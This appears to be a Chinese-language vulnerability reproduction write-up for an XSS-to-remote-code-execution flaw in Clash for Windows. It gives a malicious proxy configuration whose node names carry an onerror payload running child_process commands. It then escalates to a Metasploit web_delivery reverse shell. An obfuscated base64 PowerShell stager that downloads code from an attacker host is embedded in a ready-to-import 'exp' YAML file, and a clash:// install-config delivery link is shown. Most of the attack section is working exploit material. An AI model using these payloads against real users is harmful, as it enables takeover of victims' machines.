0x01 漏洞描述
clash for windows是一個使用 Go 語言編寫,基于規則的跨平台代理軟體核心程式。 Clash for Windows 是運作在 Windows 上的一圖形化 Clash 分支。通過 Clash API 來配置和控制 Clash 核心程式,便于使用者可視化操作和使用。
下載下傳連結
https://github.com/Fndroid/clash_for_windows_pkg/releases
目前最新版本為V 0.20.12。
Windows 上的 clash_for_windows 在訂閱一個惡意連結時存在遠端指令執行漏洞。代理規則配置檔案中未設定嚴格的輸入檢測,攻擊者可通過構造代理配置檔案中的 XSS Payload 來執行任意 javascript 指令。
0x02 漏洞影響
影響版本版本:< V 0.20.12V
作業系統:Windows x64
系統版本:Windows 11
風險等級:高危
0x03 漏洞複現
本次漏洞複現使用的版本為v 0.18.8 系統為Windows10
建立 poc.yaml 檔案,内容如下:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
打開clash,進入Profiles,點選 import 導入剛剛建立的 poc.yaml 檔案
點選切換到導入的 yaml 檔案上
切換節點時,會彈出電腦,說明遠端代碼執行成功
上線msf
啟動msf,搜尋 web_delivery 子產品
使用 exploit/multi/script/web_delivery 子產品
設定 lhost
set lhost 攻擊機ip
設定 target
設定 payload
生成反彈shell的payload
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAFQAQgBrAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMAVABCAGsALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAFQAQgBrAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADEAMAA4ADoAOAAwADgAOQAvADAAeQBhAEUASwBpAE0ANgBkAHYALwBYAHkARAB3AEwATQBtAHoAbgB4ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AOAAxAC4AMQAwADgAOgA4ADAAOAA5AC8AMAB5AGEARQBLAGkATQA2AGQAdgAnACkAKQA7AA==
制作exp
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: select
proxies:
- a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
将exp放到攻擊機(kali)的根目錄下
在clash中導入
點選切換到導入的 yaml 檔案上
切換節點時,就能上線msf
0x04 漏洞分析
crash_for_windows由 Electron 提供支援,該産品在代理規則配置檔案中未設定嚴格的輸入檢測,攻擊者可通過構造代理配置檔案中的XSS Payload來執行任意JavaScript指令。
"proxies"中的"name"字段嵌入html标簽,"onerror"時觸發語句執行。
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
此外也可以使用本地導入的方式,将yaml的配置檔案導入。
另一種方式使用浏覽器彈窗進行操作。
clash://install-config?url=http://ip:port/eval.txt&name=RCE
0x05 修複建議
更新到最新版本
0x06 參考連結
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710
https://blog.csdn.net/WEARE001/article/details/123146639
https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ